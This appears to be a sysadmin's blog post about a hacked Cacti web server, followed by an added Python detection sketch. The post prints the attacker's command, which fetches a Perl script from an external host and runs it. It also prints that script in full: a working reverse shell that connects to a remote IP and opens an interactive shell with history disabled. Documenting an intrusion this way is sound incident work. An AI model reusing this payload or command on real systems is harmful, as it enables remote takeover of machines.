Cacti gets hacked

I noticed a www process spinning away on bean:

root@bean~$ptree 15591
405 /usr/local/apache2/bin/httpsd -k start
438 /usr/local/apache2/bin/httpsd -k start
15591 sh -c wget https://881107.com/ping.txt;mv ping.txt temp2006;perl temp2006 203.11
14402 perl temp2006 203.118.99.19 3303

and then after looking at the code:

root@bean~$more ping.txt
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");

noticed that it looked like a known hack attempt as documented here. So for the time being I’ve disabled web access until I can re-install a web zone.
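
The ptree listing above is the giveaway: a shell and a perl interpreter running underneath the web server. As an added example (not part of the original post), this sketch parses ptree-style output and flags that pattern; the sample listing, the placeholder URL and address, and the program-name lists are assumptions constructed for illustration.

```python
import re

# Constructed sample modelled on the ptree listing in the post (two-space
# indent per level). URL and address are placeholders, not from the post.
SAMPLE_PTREE = """\
405   /usr/local/apache2/bin/httpsd -k start
  438   /usr/local/apache2/bin/httpsd -k start
    15591 sh -c wget https://example.invalid/ping.txt;mv ping.txt temp2006;perl temp2006 192.0.2.10 3303
      14402 perl temp2006 192.0.2.10 3303
  439   /usr/local/apache2/bin/httpsd -k start
612   /usr/lib/ssh/sshd
  700   -bash
"""

WEB_SERVERS = {"httpd", "httpsd", "apache2", "nginx"}   # assumed names
INTERPRETERS = {"sh", "bash", "ksh", "perl", "python", "wget", "curl", "nc"}
FETCH_THEN_RUN = re.compile(r"\b(wget|curl)\b.*;.*\b(perl|python|sh)\b")
LINE = re.compile(r"^( *)(\d+)\s+(.*)$")

def prog(cmd):
    """Basename of argv[0], without the leading '-' of a login shell."""
    return cmd.split()[0].rsplit("/", 1)[-1].lstrip("-")

def find_webserver_shells(ptree_text):
    """Return one finding per interpreter running below a web server."""
    stack, findings = [], []   # stack holds (indent, pid, cmd) ancestors
    for raw in ptree_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        indent, pid, cmd = len(m.group(1)), int(m.group(2)), m.group(3)
        while stack and stack[-1][0] >= indent:   # leave finished subtrees
            stack.pop()
        server = next((a for a in stack if prog(a[2]) in WEB_SERVERS), None)
        if server and prog(cmd) in INTERPRETERS:
            findings.append({
                "pid": pid,
                "server_pid": server[1],
                "chain": [a[1] for a in stack] + [pid],
                "fetch_then_run": bool(FETCH_THEN_RUN.search(cmd)),
                "cmd": cmd,
            })
        stack.append((indent, pid, cmd))
    return findings

if __name__ == "__main__":
    for f in find_webserver_shells(SAMPLE_PTREE):
        print(f["pid"], "under web server", f["server_pid"], f["chain"], f["fetch_then_run"])
```

Legitimate CGI scripts and pollers started by the web server will match too, so expect to keep an allowlist of known command lines.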